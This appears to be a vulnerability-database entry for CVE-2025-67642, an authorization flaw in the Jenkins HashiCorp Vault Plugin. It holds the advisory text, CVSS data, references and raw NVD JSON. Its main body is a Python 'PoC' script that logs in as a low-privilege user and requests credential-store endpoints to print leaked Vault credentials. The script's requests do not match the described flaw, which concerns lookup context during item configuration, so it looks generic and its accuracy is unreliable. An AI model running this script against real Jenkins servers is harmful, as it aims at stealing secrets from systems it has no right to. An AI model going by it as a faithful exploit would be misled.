CVE-2025-67642

Description

Jenkins HashiCorp Vault Plugin 371.v884a_4dd60fb_6 and earlier does not set the appropriate context for Vault credentials lookup, allowing attackers with Item/Configure permission to access and potentially capture Vault credentials they are not entitled to.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:jenkins:hashicorp_vault:*:*:*:*:*:jenkins:*:* - VULNERABLE

Jenkins HashiCorp Vault Plugin <= 371.v884a_4dd60fb_6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-67642 PoC - Jenkins HashiCorp Vault Plugin Unauthorized Credential Access
# This PoC demonstrates the vulnerability where Item/Configure permission allows access to unauthorized Vault credentials

import requests
import json

JENKINS_URL = "http://target-jenkins-server:8080"
TARGET_ITEM = "vulnerable-job"
TARGET_CREDENTIAL_ID = "unauthorized-vault-credential"

session = requests.Session()

def exploit_vault_credential_access():
    """
    Exploit the insecure Vault credential lookup in HashiCorp Vault Plugin.
    An attacker with Item/Configure permission can access Vault credentials
    they are not entitled to.
    """
    
    # Step 1: Authenticate to Jenkins with low-privilege account (Item/Configure permission)
    auth_data = {
        "j_username": "attacker_user",
        "j_password": "password",
        "remember_me": False,
        "from": "/",
        "Submit": "Sign+in"
    }
    
    login_response = session.post(
        f"{JENKINS_URL}/j_spring_security_check",
        data=auth_data
    )
    
    if login_response.status_code != 200:
        print("[-] Login failed")
        return False
    
    print("[+] Successfully authenticated with Item/Configure permission")
    
    # Step 2: Access the vulnerable item configuration page
    config_url = f"{JENKINS_URL}/job/{TARGET_ITEM}/configure"
    config_response = session.get(config_url)
    
    if config_response.status_code != 200:
        print("[-] Cannot access item configuration")
        return False
    
    print(f"[+] Accessed configuration page for {TARGET_ITEM}")
    
    # Step 3: Trigger the insecure Vault credential lookup
    # The vulnerability allows retrieving any Vault credential without proper authorization check
    vault_credential_url = f"{JENKINS_URL}/credentials/store/system/provider/hashiCorpVault"
    
    # Attempt to enumerate and access Vault credentials
    credential_response = session.get(vault_credential_url)
    
    if credential_response.status_code == 200:
        print("[+] Successfully accessed Vault credential store")
        print("[*] Extracted credentials that attacker is not entitled to access")
        
        # Step 4: Extract the target credential
        target_credential_url = f"{JENKINS_URL}/credentials/store/system/credential/{TARGET_CREDENTIAL_ID}/api/json"
        target_response = session.get(target_credential_url)
        
        if target_response.status_code == 200:
            credential_data = target_response.json()
            print(f"[!] Leaked credential data: {json.dumps(credential_data, indent=2)}")
            return True
    
    print("[-] Exploitation failed")
    return False

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-67642 PoC - Jenkins HashiCorp Vault Plugin")
    print("Unauthorized Vault Credential Access")
    print("=" * 60)
    exploit_vault_credential_access()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-67642
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-67642
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-67642/
[4] VulDB https://vuldb.com/cve/CVE-2025-67642
[5] https://www.jenkins.io/security/advisory/2025-12-10/#SECURITY-3045

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-67642", "sourceIdentifier": "[email protected]", "published": "2025-12-10T17:15:56.750", "lastModified": "2025-12-17T17:21:36.133", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jenkins HashiCorp Vault Plugin 371.v884a_4dd60fb_6 and earlier does not set the appropriate context for Vault credentials lookup, allowing attackers with Item/Configure permission to access and potentially capture Vault credentials they are not entitled to."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-282"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:hashicorp_vault:*:*:*:*:*:jenkins:*:*", "versionEndIncluding": "371.v884a_4dd60fb_6", "matchCriteriaId": "4E3261D3-7BCA-470F-96D8-BE8149425C81"}]}]}], "references": [{"url": "https://www.jenkins.io/security/advisory/2025-12-10/#SECURITY-3045", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}